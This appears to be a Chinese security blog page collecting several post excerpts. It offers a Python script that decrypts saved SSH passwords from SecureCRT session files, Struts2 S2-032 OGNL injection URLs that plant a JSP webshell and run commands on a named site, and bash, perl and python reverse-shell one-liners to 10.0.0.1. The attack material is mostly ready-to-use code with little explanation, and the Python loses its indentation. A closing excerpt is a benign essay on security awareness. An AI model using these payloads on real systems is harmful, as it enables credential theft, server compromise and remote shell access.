查看SecureCRT session配置文件中的密码

secureCRT将每个session的配置文件保存在C:\Documents and Settings\Administrator\Application Data\VanDyke下的config文件夹。根据session名找到对应的配置文件。

安装Crypto
https://pypi.python.org/pypi/pycrypto
wget https://pypi.python.org/packages/source/p/pycrypto/pycrypto-2.6.1.tar.gz
tar -zxvf pycrypto-2.6.1.tar.gz
cd pycrtyto-2.6.1
python setup.py build
python setup.py install
如果报错,则安装python-devel
yum install python-devel

Python代码

from Crypto.Cipher import Blowfish
import argparse
import re

def decrypt(password) :
c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
p = ''
while padded[:2] != '\x00\x00' :
p += padded[:2] padded = padded[2:] return p.decode('UTF-16')

REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)')
REGEX_PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)')
REGEX_PORT = re.compile(ur'D:"\[SSH2\] Port"=([0-9a-f]{8})')
REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)')

def hostname(x) :
m = REGEX_HOSTNAME.search(x)
if m :
return m.group(1)
return '???'

def password(x) :
m = REGEX_PASWORD.search(x)
if m :
return decrypt(m.group(1))
return '???'

def port(x) :
m = REGEX_PORT.search(x)
if m :
return '-p %d '%(int(m.group(1), 16))
return ''

def username(x) :
m = REGEX_USERNAME.search(x)
if m :
return m.group(1) + '@'
return ''

parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files')
parser.add_argument('files', type=argparse.FileType('r'), nargs='+',
help='session file(s)')

args = parser.parse_args()

for f in args.files :
c = f.read().replace('\x00', '')
print f.name
print "ssh %s%s%s # %s"%(port(c), username(c), hostname(c), password(c))

Struts2代码执行利用工具和exp

写入一句话

http://cls.pw/Index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=%2fitest.jsp&content=%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%28new%20java.io.FileOutputStream%28application.getRealPath%28%22%5C%5C%22%29%2brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%25%3E

回显

http://cls.pw/Index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.cls_cmd[0],%23b%3d%23parameters.cls_cmd[1],%23c%3d%23parameters.cls_cmd[2],%23j%3d(new+java.lang.ProcessBuilder(new+java.lang.String[]{%23c})).start(),%23k%3d%23j.getInputStream(),%23l%3dnew+java.io.InputStreamReader(%23k),%23m%3dnew+java.io.BufferedReader(%23l),%23n%3dnew+char[100],%23m.read(%23n),%23req%3d%23context.get(%23a),%23cls%3d%23context.get(%23parameters.cls_cmd[1]),%23cls.getWriter().println(%23n),%23cls.getWriter().flush(),%23cls.getWriter().close(),1?%23pr:%23request.toString&cls_cmd=com.opensymphony.xwork2.dispatcher.HttpServletRequest&cls_cmd=com.opensymphony.xwork2.dispatcher.HttpServletResponse&cls_cmd=id

两个利用工具:

Struts032漏洞利用工具1

Struts032漏洞利用工具2

 

 

shell反弹

bash版本:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

perl版本:

perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

python版本:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Read more

木桶原理–缺失的安全意识

网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统联系可靠正常的运行,网络服务不中断。

服务商给用户一个箱子,用户在箱子中放入资料,一把钥匙可以打开一个箱子,用户可以用钥匙打开自己的箱子。这个用于存放资料的箱子,具有保密性、 完整性、可用性、可控性,形成一个简单的网络安全模型。

箱子并不是绝对安全的,它受到来自外界以及自身各种原因的干扰——自然灾难、内部信息泄露、外部信息泄露、黑客攻击、计算机故障。为了防止这些情况的发生,于是有了安全管理策略的存在。

1

Read more